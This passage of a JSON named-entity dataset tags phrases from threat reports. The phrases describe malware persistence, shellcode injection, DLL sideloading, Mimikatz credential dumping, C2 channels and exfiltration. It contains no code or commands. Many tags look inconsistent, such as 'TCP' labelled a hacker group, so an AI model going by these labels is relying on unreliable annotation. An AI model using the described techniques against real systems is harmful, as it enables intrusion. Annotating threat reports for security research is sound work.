- "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "persists", - "by", - "means", - "of", - "a", - "registry", - "run", - "key", - "or", - "a", - "startup", - "folder" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "adding", - "a", - "scheduler", - "task," - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "creates", - "a", - "task", - "with", - "schtasks", - "for", - "persistence" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "that", - "all", - "three", - "intermediate", - "C2", - "servers" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "possible", - "proxy", - "servers", - "(any", - "indicated", - "in", - "the", - "configuration", - "plus", - "system", - "proxies)", - "and", - "C2", - "servers" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "domains", - "give", - "attackers", - "the", - "ability", - "to", - "mask", - "malicious", - "traffic", - "as", - "legitimate", - "activity", - "within", - "the", - "company" - ], - "ner_tags": [ - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "proxy", - "server" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "proxy" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "–", - "proxy", - "server", - "address", - "and", - "credentials" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "proxy", - "server" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "collects", - "and", - "sends", - "system", - "information" - ], - "ner_tags": [ - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "I-Features" - ] - }, - { - "tokens": [ - "OS", - "uptime" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Operating", - "system", - "version", - "and", - "whether", - "it", - "is", - "32-bit", - "or", - "64-bit" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Computer", - "name", - "Name", - "of", - "running", - "module", - "PID" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Shellcode", - "version", - "and", - "whether", - "it", - "is", - "32-bit", - "or", - "64-bit" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Whether", - "the", - "OS", - "is", - "32-bit", - "or", - "64-bit" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Computer", - "name" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "collect", - "information", - "about", - "the", - "computer", - "name", - "and", - "OS", - "version", - "and", - "whether", - "it", - "is", - "32-bit", - "or", - "64-bit" - ], - "ner_tags": [ - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Network", - "adapter", - "IP", - "addresses", - "MAC", - "address", - "of", - "one", - "of", - "the", - "adapters" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "List", - "of", - "IP", - "addresses" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "MAC", - "addresses", - "of", - "network", - "adapters" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Collects", - "the", - "configuration", - "of", - "active", - "connector", - "instances", - "other", - "than", - "the", - "RPCConnector", - "and", - "RPCBindConnector", - "classes." - ], - "ner_tags": [ - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "collect", - "information", - "about", - "the", - "IP", - "and", - "MAC", - "addresses", - "of", - "the", - "infected", - "machine" - ], - "ner_tags": [ - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Username" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "Username", - "and", - "workgroup" - ], - "ner_tags": [ - "B-Idus", - "O", - "O" - ] - }, - { - "tokens": [ - "collect", - "information", - "about", - "the", - "name", - "of", - "the", - "current", - "user" - ], - "ner_tags": [ - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Transport-level", - "protocol" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Standard", - "TCP", - "connection" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "two", - "TCP", - "connections." - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Duplication", - "of", - "socket", - "with", - "TLS", - "connection" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "establishes", - "a", - "TCP", - "connection" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "messages", - "are", - "exchanged", - "in", - "the", - "original", - "TCP", - "connection", - "(without", - "TLS", - "encryption)." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KCP", - "protocol" - ], - "ner_tags": [ - "B-Way", - "O" - ] - }, - { - "tokens": [ - "uses", - "KCP", - "on", - "top", - "of", - "a", - "TCP", - "connection" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "three", - "ways", - "to", - "connect", - "to", - "the", - "C2", - "server" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Transport", - "protocol", - "3,", - "port", - "8443", - "Transport", - "protocol", - "2,", - "port", - "80", - "Transport", - "protocol", - "1,", - "port", - "8080" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TcpConnector", - "and", - "TcpBindConnector", - "are", - "classes", - "responsible", - "for", - "connecting", - "over", - "TCP", - "as", - "client", - "and", - "server" - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Transport", - "protocols", - "TCP" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RPC", - "(Pipe)" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Network-level", - "protocol" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "KCP", - "protocol" - ], - "ner_tags": [ - "B-Way", - "O" - ] - }, - { - "tokens": [ - "KCP", - "protocol" - ], - "ner_tags": [ - "B-Way", - "O" - ] - }, - { - "tokens": [ - "support", - "for", - "multiple", - "transport", - "protocols", - "for", - "connecting", - "to", - "C2", - "servers" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Features", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features" - ] - }, - { - "tokens": [ - "use", - "TCP", - "and", - "UDP", - "for", - "C2", - "connections" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "AES-128", - "is", - "the", - "encryption", - "algorithm", - "used." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "encrypted", - "with", - "AES-256-CBC;" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "is", - "encrypted", - "in", - "the", - "standard", - "way" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "encrypted", - "in", - "the", - "backdoor's", - "standard", - "way," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "data", - "is", - "encrypted", - "in", - "the", - "standard", - "way" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "AES", - "for", - "encrypting", - "traffic", - "in", - "its", - "backdoors" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "B-SamFile", - "B-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "injectors" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "run", - "it", - "in", - "an", - "active", - "process" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "running", - "an", - "arbitrary", - "command", - "in", - "a", - "CHM", - "file", - "via", - "an", - "ActiveX", - "object" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "runs", - "in", - "a", - "new", - "process" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "is", - "injected", - "in", - "a", - "similar", - "way" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "injected", - "into" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Crosswalk", - "and", - "Metasploit", - "injectors" - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "inject", - "shellcode", - "into", - "the", - "process" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SeDebugPrivilege" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "finds", - "the", - "API", - "functions", - "it", - "needs" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Microsoft", - "CryptoAPI" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Cryptography", - "API:" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "via", - "a", - "ZwCreateSection", - "call" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "via", - "ZwMapViewOfSection", - "calls" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "execute", - "a", - "method", - "from", - "the", - ".NET", - "assembly" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "HttpWebRequest", - "and", - "HttpListener", - "from", - ".NET", - "Framework", - "are", - "used", - "for", - "client", - "and", - "server", - "implementations" - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RPCConnector", - "and", - "RPCBindConnector" - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "TcpBindConnector", - "and", - "HttpBindConnector" - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "TcpConnector/TcpBindConnector" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "CreateThread" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "uses", - "various", - "WinAPI", - "functions", - "to", - "run", - "malicious", - "shellcode", - "in", - "the", - "current", - "process", - "or", - "to", - "inject", - "it", - "into", - "another", - "process" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "finds", - "the", - "PID", - "of", - "the", - "target", - "process" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Current", - "processes", - "are", - "checked" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Name", - "of", - "running", - "module", - "PID" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "injects", - "shellcode", - "into", - "it" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "injects", - "shellcode", - "into", - "the", - "processes", - "explorer.exe,", - "winlogon.exe,", - "wmplayer.exe,", - "svchost.exe,", - "and", - "spoolsv.exe" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "B-SamFile", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "archive", - "was", - "distributed" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "unpacks", - "an", - "HTML" - ], - "ner_tags": [ - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "is", - "unpacked", - "from", - "the", - "CHM", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "SFX", - "archive" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "unpacks", - "three", - "files" - ], - "ner_tags": [ - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "contents", - "are", - "unpacked" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SFX", - "archiveWhen", - "unpacked" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "use", - "VMProtect", - "or", - "custom", - "packers", - "for", - "its", - "malware" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "can", - "send", - "system", - "information" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "is", - "the", - "library", - "Funny.dll" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "dynamically", - "loads", - "the", - "library" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "that", - "contains", - "the", - "library", - "mapistub.dll," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "dynamically", - "loaded", - "from", - "a", - "Base64", - "constant", - "defined", - "in", - "the", - "main", - "assembly." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "conditional", - "jumps", - "that", - "never", - "run", - "are", - "included" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "obfuscated", - "with", - "junk", - "instructions", - "and", - "inverted", - "conditional", - "jumps", - "(combinations", - "of", - "jle/jg", - "and", - "the", - "like)." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "file", - "is", - "deleted" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "wiping", - "traces", - "of", - "malware", - "from", - "the", - "system" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "saved", - "in", - "the", - "registry" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "passes", - "control", - "to", - "a.bat." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cleanup", - "script" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "cmd.exe", - "and", - ".bat", - "files", - "to", - "run", - "commands" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "sends", - "phishing", - "messages", - "with", - "malicious", - "attachments" - ], - "ner_tags": [ - "O", - "B-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "persists", - "on", - "infected", - "machines", - "by", - "creating", - "new", - "services" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "uses", - "legitimate", - "utilities", - "to", - "load", - "DLLs" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "establish", - "C2", - "connections", - "via", - "a", - "peer-to-peer", - "network", - "of", - "infected", - "hosts" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "support", - "C2", - "connections", - "via", - "an", - "external", - "HTTP/SOCKS", - "proxy" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "using", - "the", - "API", - "RegisterServiceHandlerA", - "then", - "SetServiceStatus,", - "and", - "finally", - "CreateEventA." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "abusing", - "API", - "calls", - "in", - "the", - "Operating", - "System." - ], - "ner_tags": [ - "B-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "malware", - "also", - "decrypts" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "the", - "decryption", - "routine" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Decryption", - "routine" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "AES", - "256", - "decryption", - "key", - "of", - "the", - "payload" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "strings", - "decoded", - "when", - "running" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "decrypt", - "the", - "payload", - "from", - "the", - ".dat", - "file", - "using", - "the", - "AES-256-CTR", - "decryption", - "algorithm", - "and", - "starts", - "to", - "execute." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "injects", - "the", - "payload", - "in", - "memory." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "malware", - "was", - "injected", - "into", - "a", - "SVCHOST", - "process", - "where", - "a", - "driver", - "location", - "pointed", - "to", - "the", - "config", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "injects", - "it", - "into", - "a", - "process." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "process", - "injection", - "in", - "one", - "of", - "the", - "svchost", - "processes" - ], - "ner_tags": [ - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "injected", - "themselves", - "into", - "Windows", - "Media", - "Player" - ], - "ner_tags": [ - "I-Way", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "injected", - "code", - "in", - "a", - "process" - ], - "ner_tags": [ - "I-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "adversary", - "had", - "removed", - "the", - "payload", - "file", - "from", - "the", - "system." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Where", - "in", - "the", - "beginning", - "of", - "the", - "campaign", - "the", - "adversary", - "was", - "sloppy,", - "during", - "the", - "last", - "months", - "of", - "activity", - "they", - "became", - "more", - "careful", - "and", - "started", - "to", - "remove", - "evidence" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Besides", - "the", - "use", - "of", - "Mimikatz", - "to", - "dump", - "credentials," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "acquired", - "through", - "the", - "use", - "of", - "Mimikatz,", - "or", - "creating", - "LSASS", - "dumps," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "Mimikatz", - "and", - "dumping", - "lsass," - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Using", - "Mimikatz", - "and", - "dumping", - "of", - "lsass," - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "makes", - "use", - "of", - "the", - "technique", - "“DLL", - "Sideloading”" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "When", - "the", - "executable", - "is", - "run,", - "the", - "DLL", - "next", - "to", - "it", - "is", - "loaded." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "dll", - "is", - "run", - "using", - "the", - "command", - "“rundll32.exe" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "The", - "model", - "uses", - "the", - "persistence", - "technique", - "utilizing", - "svchost.exe", - "with", - "service.dll", - "to", - "install", - "a", - "rogue", - "service." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "DLL", - "embeds", - "several", - "obfuscated", - "strings" - ], - "ner_tags": [ - "O", - "B-SamFile", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "was", - "to", - "start", - "a", - "program", - "as", - "a", - "service" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "DLL", - "is", - "used", - "to", - "create", - "a", - "malicious", - "service" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O" - ] - }, - { - "tokens": [ - ".", - "The", - "name", - "of", - "the", - "created", - "service,", - "“SysmainUpdate”,", - "is", - "usurping", - "the", - "name", - "of", - "the", - "legitimate", - "service", - "“SysMain”", - "which", - "is", - "related", - "to", - "the", - "legitimate", - "DLL", - "sysmain.dll", - "and", - "also", - "to", - "the", - "Superfetch", - "service." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Adversary", - "installed", - "custom", - "backdoor", - "as", - "a", - "service" - ], - "ner_tags": [ - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Adversary", - "launched", - "backdoor", - "and", - "some", - "tools", - "as", - "a", - "Windows", - "Service" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "command", - "line", - "dump", - "of", - "the", - "memory:", - "cmd", - "/c" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "When", - "running", - "the", - "file", - "from", - "the", - "command", - "line," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "In", - "some", - "cases,", - "batch", - "(.bat)", - "scripts", - "were", - "created" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "content", - "in", - "a", - "batch", - "script:" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "exfiltration", - "of", - "data", - "on", - "the", - "system,", - "such", - "as", - "OS,", - "Processor", - "(architecture)," - ], - "ner_tags": [ - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Username" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "WMI", - "activity", - "[T1546.003]", - "was", - "also", - "observed", - "to", - "execute", - "commands", - "on", - "the", - "systems." - ], - "ner_tags": [ - "B-Org", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WMI", - "was", - "used", - "for", - "running", - "commands", - "on", - "remote", - "systems" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "From", - "a", - "persistence", - "point", - "of", - "view,", - "scheduled", - "tasks" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Adversary", - "ran", - "scheduled", - "tasks", - "for", - "persistence", - "of", - "certain", - "malware", - "samples" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "and", - "the", - "use", - "of", - "valid", - "accounts" - ], - "ner_tags": [ - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features" - ] - }, - { - "tokens": [ - "they", - "were", - "looking", - "to", - "get", - "valid", - "accounts." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "the", - "adversary", - "gained", - "credentials", - "in", - "the", - "network" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "files", - "were", - "exfiltrated", - "over", - "the", - "backdoor" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "data", - "was", - "stored", - "in", - "a", - "location", - "in", - "the", - "Internet", - "Information", - "Services", - "(IIS)", - "web", - "server", - "and", - "exfiltrated", - "over", - "HTTP", - "using", - "GET", - "requests", - "towards", - "the", - "exact", - "file", - "paths" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "malware", - "exfiltrated", - "data", - "towards", - "a", - "C2" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "When", - "the", - "data", - "was", - "gathered", - "on", - "a", - "local", - "system", - "using", - "the", - "backdoor" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "and", - "the", - "rar", - "files", - "were", - "deleted" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "exfiltrated", - "over", - "HTTP", - "using", - "GET", - "requests" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HTTP", - "traffic", - "to", - "C2" - ], - "ner_tags": [ - "B-Way", - "I-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "packet", - "data", - "was", - "customized", - "and", - "sent", - "through", - "a", - "POST", - "request", - "with", - "several", - "headers", - "towards", - "the", - "C2." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "malware", - "started", - "to", - "open", - "up", - "both", - "UDP", - "and", - "TCP", - "ports", - "to", - "connect", - "with", - "a", - "C2", - "server" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - 